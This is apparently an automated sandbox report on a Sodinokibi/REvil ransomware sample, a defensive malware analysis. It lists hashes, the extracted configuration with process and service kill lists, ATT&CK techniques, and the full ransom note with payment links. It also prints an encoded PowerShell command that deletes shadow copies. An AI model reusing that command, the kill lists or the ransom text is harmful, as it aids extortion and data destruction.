Analysis

  • max time kernel
    131s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    05-08-2023 08:38

General

  • Target

    97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe

  • Size

    221KB

  • MD5

    77ed1092409c927f5cd1992021f99147

  • SHA1

    4c9027e660614db7fe653e67a7ac0b726b52cc44

  • SHA256

    97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463

  • SHA512

    1e01f85f50179fb7620680809862c28c8955e696b397acd6766a2d8a18b81cc08f99c2a059213797ea8de1e004412b9d4853cf1c2ae9f451505322b00e26238a

  • SSDEEP

    6144:Za/6o9aptGtbbqcqjuEyileXEHpSYxyEpq:S5atGtfqcqju3iXHpSgq

Malware Config

Extracted

Family

sodinokibi

Botnet

$2a$10$MaBWjCXKB3kROpX5KeARM.SC7uhuuBCbvRC/J3KvhMn3f11EUJg3.

Campaign

4402

Decoy

gopackapp.com

croftprecision.co.uk

sanyue119.com

chatizel-paysage.fr

falcou.fr

theshungiteexperience.com.au

xn--vrftet-pua.biz

slimani.net

vibethink.net

mrxermon.de

hebkft.hu

danskretursystem.dk

castillobalduz.es

pmc-services.de

advizewealth.com

pixelarttees.com

testcoreprohealthuk.com

ino-professional.ru

alvinschwartz.wordpress.com

mercantedifiori.com

Attributes
  • net

    true

  • pid

    $2a$10$MaBWjCXKB3kROpX5KeARM.SC7uhuuBCbvRC/J3KvhMn3f11EUJg3.

  • prc

    isqlplussvc

    mydesktopqos

    onenote

    ocomm

    dbsnmp

    powerpnt

    winword

    thebat

    sql

    infopath

    visio

    firefox

    tbirdconfig

    wordpad

    agntsvc

    msaccess

    sqbcoreservice

    xfssvccon

    dbeng50

    thunderbird

    outlook

    mspub

    excel

    mydesktopservice

    steam

    ocautoupds

    oracle

    encsvc

    synctime

    ocssd

  • ransom_oneliner

    Soon you may lose your files FOREVER Find: "readme-{EXT}-NOW.txt" in folders or on your desktop! YOU HAVE A FEW DAYS OR A FILE WILL BE LOST FOREVER !!!

  • ransom_template

    Your files are locked due to a vulnerability in your system by "{EXT}" extension. You will not be able to decrypt the files yourself, in the worst case you can destroy the data irreversibly. The only way to unlock your data is to buy the decryption program. Go to the link written below to more details. If you cannot do this yourself, find a data recovery company in internet. They cannot help you unlock your data, because only we have decryption key, but will help you make a payment and provide you guarantees. ATTENTION! DATA RECOVERY AGENCIES WORK AND DURING THE CORONOVIRUS QUARANTINE, THEY WILL HELP YOU REMOTE. Also, I ask you to note, you have no long time, if you do not make payment soon, the price for the decryptor will double. So I recommend you dont waste time and move! Go to the page through the browser: http://decryptor.cc/{UID} If your site does not open, then download the "TOR Browser" (https://torproject.org/). If you cannot access the download page of the "TOR Browser", then download the VPN! After installing "TOR Browser", open it and follow the link: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} After going to the site, enter the following code: {KEY}

  • sub

    4402

  • svc

    vss

    backup

    svc$

    memtas

    sql

    veeam

    mepocs

    sophos

Extracted

Path

C:\Users\readme-cr0v4-NOW.txt

Ransom Note
Your files are locked due to a vulnerability in your system by "cr0v4" extension. You will not be able to decrypt the files yourself, in the worst case you can destroy the data irreversibly. The only way to unlock your data is to buy the decryption program. Go to the link written below to more details. If you cannot do this yourself, find a data recovery company in internet. They cannot help you unlock your data, because only we have decryption key, but will help you make a payment and provide you guarantees. ATTENTION! DATA RECOVERY AGENCIES WORK AND DURING THE CORONOVIRUS QUARANTINE, THEY WILL HELP YOU REMOTE. Also, I ask you to note, you have no long time, if you do not make payment soon, the price for the decryptor will double. So I recommend you dont waste time and move! Go to the page through the browser: http://decryptor.cc/B455AE79B35BE10E If your site does not open, then download the "TOR Browser" (https://torproject.org/). If you cannot access the download page of the "TOR Browser", then download the VPN! After installing "TOR Browser", open it and follow the link: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B455AE79B35BE10E After going to the site, enter the following code: wlWlX1hKr7/taxO8KVG324TRSZko6yQnAlI3D2Gjqo9WP/osOkI9oBWUd3JDQln6 VSV/3I4UGHepHjb/ZakJs5zEhS1DG3XZgTdh6g8VtCBOppvBlJZ/P70JK2tTFal1 EzEBfxQNs4/ZLqrR7oJrIVo2BBqfscp2rocRpx/vIyl3mddTxhpCV93mFxaB8c+x u0dJJUc6PkxGwlYHry/59aLdFgsLhHUw0Qtrm2uXubUTa6+yCb0vSxwfEc0vUmEy +qUJxLU2wSieXzKq1zg7jK196cvi8BDQb1BNvajuM2bSH4pZJgUYIMunUcyR2AtT J7Pfkj+T+4TUmh8pF5aYHklR8Q+9Exbxl0Ona/KMKyaCym5AuIFwptWD1rwMbUJb TvwonmtGGJ8Kk/K22H/CkywgsSPNtYJVwY8Udn7Oh6EdxCE38mQmL6h9/FTzBHOk HbolGEyGg/YP3gyzY7y9+vbjco1/C7j+1dlqrmQd4Xyr6TbEvyLuAG4mEKdb6p9z GwSAfyJxugDmVtmTpy//cnsT4WPLfucTTXmEBPp6qUQIzGnC6xL/0DcrQr0k+Ek+ gCwUrH6Cxr7u/p3vVf9t2o7AXOzuY4qVqGuibT+6wBUwkSlWr1k55lC55OwVwual pvmIu1dZZ5mE79OucRK+OQmDMDe7YUXk065hLy5ABEQwIsinwBPbLSSubaNUsSJG 8/lSm70ycODrM7RwJnLyeau+BAOVSWxHtVUtOwVlvxueooWqBPAVucTSDWJq1s8T 5b2np80T4i/AQWXMJ8QmIpE8/lAJJnb5GIk0IYi6hAmlNoKXrL2JemaBj1y0iEzs pxSDAVrSMmVUJBgR07VO0aVS5Is1cB4ibo6F28Ygxgge8rVnPgOE4BXYnUzBCrwV ryXWIp9KMhJDgQ04dxQH2j4ITQE3FIW9aBURK9Ihs7K14xpG8ljy8Y46xtqHDqMt gj9UA2fZkRkuovpMsUS1HGowGG7ekME5CW+XVyBCad4G/gf3FUnC9mku6pP4ESJM G5cNuC8xk2u3ewXKvtK81F4GXkGsFAa0Bv004GvMeiDgs2CDy32zSc3RTsF3fUdU xZMebicg908oJs2xXcGtZ0+IndaC+CkfogeycVzf97QruSDYgePZTjsGJBU2idh/ iOLq5W+h+6GbFatH8hWc2CyXTZz9XDQkLJr32UGQDcpLaVB8LW/HATJSNRXo0mVL OUGbS1x0nBZknPGQasDGR/EJnEYlhGhxotOW2LD6J8qgZWbs08IQTOGdgWDuftH4 KHbJ76EodeYwkbbQhD9+l5e2eHE+HT8Aml8Qa4+oPQX+Ccf/JQsiYaiRtSYqFhDq 5yeIR9x55E/3NgFbnhrSC0jB+BP5NhxADru51VhP
URLs

http://decryptor.cc/B455AE79B35BE10E

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B455AE79B35BE10E

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 16 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe
    "C:\Users\Admin\AppData\Local\Temp\97a2331bc8088327dd97c4d01c3183cec88e4d5b724365602b982036a6306463.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2332
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1952
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2888
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2436

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Privilege Escalation

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Defense Evasion

    Modify Registry

    3
    T1112

    Subvert Trust Controls

    1
    T1553

    Install Root Certificate

    1
    T1553.004

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Cab4684.tmp
      Filesize

      62KB

      MD5

      3ac860860707baaf32469fa7cc7c0192

      SHA1

      c33c2acdaba0e6fa41fd2f00f186804722477639

      SHA256

      d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

      SHA512

      d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

    • C:\Users\Admin\AppData\Local\Temp\Tar48D8.tmp
      Filesize

      164KB

      MD5

      4ff65ad929cd9a367680e0e5b1c08166

      SHA1

      c0af0d4396bd1f15c45f39d3b849ba444233b3a2

      SHA256

      c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

      SHA512

      f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

    • C:\Users\readme-cr0v4-NOW.txt
      Filesize

      5KB

      MD5

      78828999c43b717fe00afd1fa00833ba

      SHA1

      b385d9f09b73e2d390ed8de004a39d8f4be64e28

      SHA256

      1e4025b1ef5c97649c18112a16d8c5a5dcfc9a5da6d97d1cf25114ed05e601e5

      SHA512

      ce9146e0af633bed5154c6158268627d508b13d056e549ce7fe03a2980fa14e7f7d96ff7bdd8bcb2bcff87f0b7533e783dcb4b7ca3baaf32de97815767f5d76c

    • C:\Windows\System32\catroot2\dberr.txt
      Filesize

      194KB

      MD5

      bc6362a1913e12e51168d98208922f59

      SHA1

      b69d30da0f081e7e320c49d127f5308a20828863

      SHA256

      f4af4fe75782f895049ff9ab95657481be015503918eb46633bd174869d4180b

      SHA512

      d42883eb6cfa77ce9efd18f6a95bd4d0cf59d33669c34bb420325adec24ee3c9ba9b09f22561049b2f583d41495f5382617f11b509f6e1babb29e216470fe068

    • memory/1952-65-0x0000000002850000-0x00000000028D0000-memory.dmp
      Filesize

      512KB

    • memory/1952-71-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp
      Filesize

      9MB

    • memory/1952-62-0x000000001B0E0000-0x000000001B3C2000-memory.dmp
      Filesize

      2MB

    • memory/1952-66-0x0000000002850000-0x00000000028D0000-memory.dmp
      Filesize

      512KB

    • memory/1952-67-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp
      Filesize

      9MB

    • memory/1952-68-0x0000000002850000-0x00000000028D0000-memory.dmp
      Filesize

      512KB

    • memory/1952-64-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp
      Filesize

      9MB

    • memory/1952-63-0x0000000002490000-0x0000000002498000-memory.dmp
      Filesize

      32KB

    • memory/2332-518-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/2332-70-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/2332-211-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/2332-69-0x00000000009E0000-0x0000000000AE0000-memory.dmp
      Filesize

      1024KB

    • memory/2332-519-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/2332-55-0x00000000009E0000-0x0000000000AE0000-memory.dmp
      Filesize

      1024KB

    • memory/2332-57-0x0000000000220000-0x000000000024B000-memory.dmp
      Filesize

      172KB

    • memory/2332-56-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/2332-640-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/2332-645-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/2332-670-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/2332-692-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB

    • memory/2332-779-0x0000000000400000-0x000000000086F000-memory.dmp
      Filesize

      4MB